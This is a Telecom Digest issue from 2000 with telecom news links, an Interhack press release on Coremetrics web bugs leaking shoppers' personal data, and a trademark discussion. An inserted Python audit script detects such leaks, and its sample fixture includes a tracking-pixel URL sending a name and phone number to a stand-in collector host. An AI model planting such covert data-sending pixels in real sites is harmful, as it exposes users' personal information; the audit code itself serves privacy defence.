Date: 2 Aug 2000 06:15:17 -0400
Message-ID: <20000802101517.9555.qmail@xuxa.iecc.com>
From: owner-telecom-digest@telecom-digest.org (Telecom Digest)
To: telecom-digest@telecom-digest.org
Subject: Telecom Digest V2000 #4
Reply-To: editor@telecom-digest.org
Sender: owner-telecom-digest@telecom-digest.org
Errors-To: owner-telecom-digest@telecom-digest.org
Precedence: bulk
X-UIDL: 925c07e129d38d6615b8be890eff325f
Status: RO
X-Status:

Telecom Digest      Wednesday, August 2 2000      Volume 2000 : Number 004

In this issue:

    FCC Delays Airwave Auction For Wireless
    Strike Could Affect Verizon Customers
    CIOs warned of cell phone risks
    Taking a Bold Step Forward in Privacy Invasion
    Net marketing firm receiving personal information
    ICB "free" articles in Telecom Digest
    Re: internet domain names.. cybersquatting? WSJ clip

----------------------------------------------------------------------

Date: 2 Aug 2000 00:15:26 -0400
From: Monty Solomon
Subject: FCC Delays Airwave Auction For Wireless

FCC Delays Airwave Auction For Wireless
(08/01/00, 3:35 p.m. ET) By Mary Mosquera, TechWeb News

The Federal Communications Commission postponed a sale of radio spectrum eagerly anticipated by wireless operators to increase capacity and spur high-speed and next generation Internet rollout.

http://www.techweb.com/wire/story/TWB20000801S0009

- --
The Telecom Digest is currently robomoderated. Please mail
messages to editor@telecom-digest.org.

------------------------------

Date: 2 Aug 2000 00:16:05 -0400
From: Monty Solomon
Subject: Strike Could Affect Verizon Customers

Strike Could Affect Verizon Customers
(08/01/00, 3:03 p.m. ET) By Kim Renay Anderson, TechWeb News

A possible strike of 85,000 East Coast telephone workers against Verizon Communications this weekend could affect business and consumer users of its voice and data services.

http://www.techweb.com/wire/story/TWB20000801S0007

------------------------------

Date: 2 Aug 2000 00:47:19 -0400
From: Monty Solomon
Subject: CIOs warned of cell phone risks

CIOs warned of cell phone risks
Corporate liability an issue, researcher says
By Bob Brewin and Jennifer DiSabatino (Jul. 31, 2000)

CIOs need to ensure that their companies' employees operate cell phones and other wireless devices in a manner that reduces health risks associated with radiation - or face the legal consequences.

http://www.computerworld.com/cwi/Printer_Friendly_Version/frame/0,1212,NAV47_STO47766-,00.html

------------------------------

Date: 2 Aug 2000 00:56:08 -0400
From: Monty Solomon
Subject: Taking a Bold Step Forward in Privacy Invasion

http://www.interhack.net/news/cm-tracking.html

FOR IMMEDIATE RELEASE

Taking a Bold Step Forward in Privacy Invasion

Interhack Corporation's Internet Privacy Project has yielded shocking results that reveal how marketers' tracking of Internet users has moved well beyond "impersonal" data collection. We reveal how the Coremetrics system can build detailed dossiers of unsuspecting Web surfers that include names, physical addresses, telephone numbers, email addresses, and other personally-identifiable information.

Among the sites that use Coremetrics are four that specifically state that they do not share personal information with third parties, namely Toys "R" Us (NYSE:TOY) sites toysrus.com and babiesrus.com, as well as Lucy.com, and Fusion.com.

On today's Internet, aggregation of such data is not only inconvenient, but it can place unsuspecting Web surfers -- including children -- at risk of becoming victims of real-world crimes including stalking and identity theft.

Mene Mene Tekel Parsin

"Perhaps consumers, the US Federal Trade Commission, and our friends in Europe should be more concerned about what Web-based vendors are actually doing online than what they admit to doing," said Matt Curtin, Interhack's founder. He added, "The industry does not want to be regulated; it wants to do whatever it can get away with. Today we tell the industry that when it comes to invading our privacy, it will get away with nothing."

Leaks Not Accidental; Formatted for Database Entry

These "leaks" to a third party data collection facility are not accidental or due to bad web site design or implementation. Using JavaScript, web bugs, and cookies in concert, an increasing number of sites are taking information that users report to them during the course of making a purchase and cause the users' browsers to send the information to an Internet-based data collection facility in a standardized format for entry into a database. The data collection facility is part of a service offered by Coremetrics to observe and to track the behavior of users as they use a vendor's Web site.

Though Coremetrics' Web site contains a rather complete and lucid description of what they are doing and how users can "opt out" of the system, not all sites inform their users that information expected to be confidential will be reported to Coremetrics. Some of those that do bury the information deep within a bunch of legal gobbledygook. In any case, many users are unknowingly providing all of the details of their Web-based purchases (except for the credit card number used for the purchase) to a third party that saves the information and makes a business of analyzing it.

Furthermore, "opt out" systems fail, as we have previously described in the technical reports DoubleClick Opt Out Protocol Failure == Opt In and Opting In, By Accident, available online at http://www.interhack.net/pubs/dc-proto-fail/ and http://www.interhack.net/pubs/netscape-doubleclick/, respectively.

System Designed To Resist Discovery

Several steps to avoid detection have been taken. The information is sent to Coremetrics by using a web bug -- a tiny invisible image that serves no purpose but to track Web surfers. The JavaScript code used to implant the web bugs and to format the data for submission to Coremetrics is obfuscated -- intentionally made difficult to read by human programmers. Finally, in typical cases where personally-identifiable information is being uploaded, the connection to Coremetrics is encrypted, preventing packet sniffers and privacy-defending systems from being able to read what is being sent.

System Likely Tracks Children Online

Perhaps most alarming of all is that at least one site using this technology is an online toy store. How can such a site tell the difference between an adult browsing the site and a child? The technology itself does not distinguish among users.

A parent who makes a purchase on such a Web site will make the Coremetrics database aware of his name, address, and phone number. Subsequent visits to the site -- including visits by children from that same computer (and the same browser) -- will be recorded and associated with the parent's profile. Or if an adult chooses to have a gift shipped directly to a child, entering the child's name and address in the "ship to" field of the order, that information will be sent to Coremetrics.

System Tracks Users as They Move from Site to Site

This system works such that instead of knowing everything about users and what they do on a particular site, the database can know everything about all users and what they do on every Coremetrics-enabled site. The more sites that use Coremetrics' tracking software, the greater the privacy invasion would become.

Whether this is actually taking place, we cannot say -- there is no way to tell the difference between what is technically possible and what is actually happening without examining Coremetrics' data handling practices and auditing the code regularly.

Tracking is not limited to purchases. Very detailed profiles are built as users browse Coremetrics-enabled pages, including products examined but not purchased. At the point where a user gives his name to the vendor to make a purchase, that name (as well as how much was spent and other information) is associated with the profile.

Sites Using System Violate Their Own Privacy Policies

Sites toysrus.com, babiesrus.com, lucy.com, and fusion.com claim not to send information about users to third parties. For example, babiesrus.com displays this text at the bottom of the page during the checkout process:

    Babiesrus.com keeps your personal information completely confidential. Click here to learn how our site is 100% safe and secure.

Following that link will take the user to a page that says:

    About SSL Encryption

    The Login, My Account, and Checkout areas of the site are fully secured using a technology called Secure Socket Layer (SSL). SSL Encryption ensures that your credit card number and personal data are always sent over the Internet safely. The information is encoded on your computer before it is sent, and then decoded on the our site's server. Furthermore, all personal data (such as mailing addresses, e-mail and billing information) is stored on a highly secured server within the data center.

What it doesn't tell you is that an encrypted connection is also being made to data.coremetrics.com that includes all of that personal data except the credit card number itself.

Failing to advise site visitors that Coremetrics is watching them results in visitors having no way to know that the monitoring technology is even being deployed.

At the very least, it is interesting to note that the sites that do not reveal their connection with Coremetrics do so against Coremetrics' advice. Coremetrics describes what it does and the principles that guide it on its privacy page at http://www.coremetrics.com/privacy.html. We encourage everyone to take note of this issue and become fully informed by seeing what all parties have to say. It is our belief that every Web user should know exactly what is being done with information about him and use that knowledge to avoid any unnecessary exposure to unpleasant surprises later.

Coremetrics and some sites that use its service, namely lucy.com and fusion.com, are licensees of the TRUSTe symbol, used to build consumer confidence!

You'll be hearing more from us on this topic. Complete details, including some defense mechanisms, are available in the Interhack Technical Report Getting to Know You (Intimately): Surreptitious Privacy Invasion on the E-Commerce Web, online at http://www.interhack.net/pubs/intimately/.

About Interhack Corporation

Interhack Corporation is a provider of services and tools for building the Internet with security and privacy in mind. Based in Columbus, Ohio, Interhack serves clients all across North America, helping them to determine compliance to security and privacy policy, in addition to assistance in all aspects of design, development, and deployment of network-based systems.

Interhack Corporation can be found on the Web at http://www.interhack.net/. The Interhack Privacy Project page is at http://www.interhack.net/projects/privacy/.

Media contact: Matt Curtin, +1 614 206 3413, .

###
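
An added example, not part of the digest or of Interhack's report: a small audit for the web-bug technique the press release above describes, run over the rendered page as saved from the browser, since the release says the bug is implanted by JavaScript and sent over an encrypted connection. The hosts, query parameter names and form values are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

class TinyImageFinder(HTMLParser):
    """Collect src URLs of <img> tags declared as 1x1 pixels or smaller."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag != "img" or not a.get("src"):
            return
        try:
            tiny = int(a.get("width", "")) <= 1 and int(a.get("height", "")) <= 1
        except (ValueError, TypeError):
            tiny = False  # missing or non-numeric size: not counted as a web bug
        if tiny:
            self.srcs.append(a["src"])

def is_third_party(url, site_domain):
    """True when the URL's host is neither the site's domain nor a subdomain of it."""
    host = (urlsplit(url).hostname or "").lower()
    return bool(host) and host != site_domain and not host.endswith("." + site_domain)

def leaked_fields(url, entered):
    """Names of tester-entered fields whose values appear in the URL's query string."""
    values = [v.lower() for _, v in parse_qsl(urlsplit(url).query)]
    return sorted(name for name, val in entered.items()
                  if any(val.lower() in v for v in values))

def audit(html, site_domain, entered):
    """List (third-party host, leaked field names) for every tiny image on the page."""
    finder = TinyImageFinder()
    finder.feed(html)
    return [(urlsplit(src).hostname, leaked_fields(src, entered))
            for src in finder.srcs if is_third_party(src, site_domain)]

# Constructed sample: a checkout page's DOM after its scripts have run.
SAMPLE_HTML = """
<img src="https://www.shop.example/logo.gif" width="120" height="40">
<img src="https://img.shop.example/spacer.gif" width="1" height="1">
<img src="https://collector.example/t.gif?nm=Pat+Doe&ph=614-555-0100&tot=42.50" width="1" height="1">
"""
# Constructed values the tester typed into the order form.
ENTERED = {"name": "Pat Doe", "phone": "614-555-0100", "email": "pat@mail.example"}

if __name__ == "__main__":
    for host, fields in audit(SAMPLE_HTML, "shop.example", ENTERED):
        print(host, "received:", ", ".join(fields) or "no entered values")
```

Matching on the values typed into the form, rather than on parameter names, keeps the check independent of how a collector labels its fields.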

------------------------------

Date: 2 Aug 2000 00:57:53 -0400
From: Monty Solomon
Subject: Net marketing firm receiving personal information

Net marketing firm receiving personal information
By The Associated Press
Special to CNET News.com
July 31, 2000, 10:20 p.m. PT

WASHINGTON--An Internet marketing company is secretly receiving names and addresses of customers visiting some popular e-commerce sites, which one privacy group called "unforgivable."

A security and privacy firm that does risk assessments for Internet retailers has found that four retailers are forwarding the personally identifiable information of customers to another firm, thereby violating the retailers' stated privacy policies.

http://news.cnet.com/news/0-1005-200-2403836.html

------------------------------

Date: 2 Aug 2000 01:09:10 -0400
From: Joseph Singer
Subject: ICB "free" articles in Telecom Digest

I do appreciate Judith Oppenheimer's contribution of articles to the digest, but every "free" article that I clicked on in both of her submissions in the latest digest were met with:

    The page you requested is available only to Registered Users.
    If you are already registered log in now, if not Register here.
    User name
    Password

If the article in the digest has an "F" next to it and you have indicated in your article that it is free to view why am I met with the above stuff??

- ---------------------------------------------------------------------------
Joseph Singer   Seattle, Washington USA
[ICQ pgr] +1 206 405 2052 [voice mail] +1 206 493 0706 [FAX]

------------------------------

Date: 2 Aug 2000 01:23:12 -0400
From: "Peter F. Dubuque"
Subject: Re: internet domain names.. cybersquatting? WSJ clip

In article , danny burstein wrote:

> Similarly, there's an AP story from this afternoon about Harvard
> University:
> BOSTON (AP) -- Harvard University is suing the Internet startup
> notHarvard.com for trademark violations, saying the online company is
> unlawfully exploiting the lucrative Ivy League name for financial gain.
> The suit, filed Monday in federal court, seeks $75,000 in damages from
> notHarvard.com...
> Yes. That's "notharvard.com"

[Disclaimer 1: I am a current employee of Harvard University, but I'm not writing in any official capacity. These are solely my own opinions.]

[Disclaimer 2: I am not a lawyer.]

Actually, notharvard.com sued Harvard University first, last week, preemptively seeking a ruling that the notharvard.com name didn't infringe upon Harvard's trademark. Apparently, management at notharvard.com felt that the potential for a future lawsuit over the name was hurting relations with prospective affiliates and investors, and wanted a ruling up front before proceeding.

Harvard's reaction should be entirely expected, since Harvard has to defend its trademark against such challenges or risk losing it. $75K is a token amount to cover things like legal costs and time spent by counsel...peanuts to a dot.com with tens of millions of dollars in venture capital.

I've heard of plenty of cases where nasty big businesses stole domain names away from innocent people under threat of legal force. (Two friends of mine who operated a BBS named after a hundred-year-old comic strip lost their domain name to a small Midwestern chain of furniture stores who wanted to put up a website.) This isn't a case like that; NotHarvard.com deliberately chose to use the name of a 364-year-old world-famous university. Nor does it fall into the xxxsucks.com category of domain names, where a trademark is used in a negative but not competitive way. Instead, NotHarvard.com is a for-profit, commercial venture seeking to do business in the realm of education.

The "Not" is a semantic game.

I don't know NotHarvard's reasons for choosing the name they did. Perhaps they wish to contrast their free services with Harvard's $30K+ annual tuition. Or perhaps they want to showcase the novelty of their approach while suggesting that what they offer is on a par with one of the world's leading universities. But whatever their motivation, Harvard owns the trademark on its name in the realm of education, and everybody knows it. If a new software company named itself NotMicrosoft, or a new TV network called itself NotCNN, the owners of the original names would sue and win. And rightly so.

They say "how can we be infringing on Harvard's trademark if in our very name we say we're not Harvard?" But if they freely admit they're not Harvard, why use Harvard's name at all instead of choosing one that is unequivocally their own?

- --
Peter F. Dubuque - peterd@shore.net - Enemy of Reason(TM) O-

------------------------------

End of Telecom Digest V2000 #4
******************************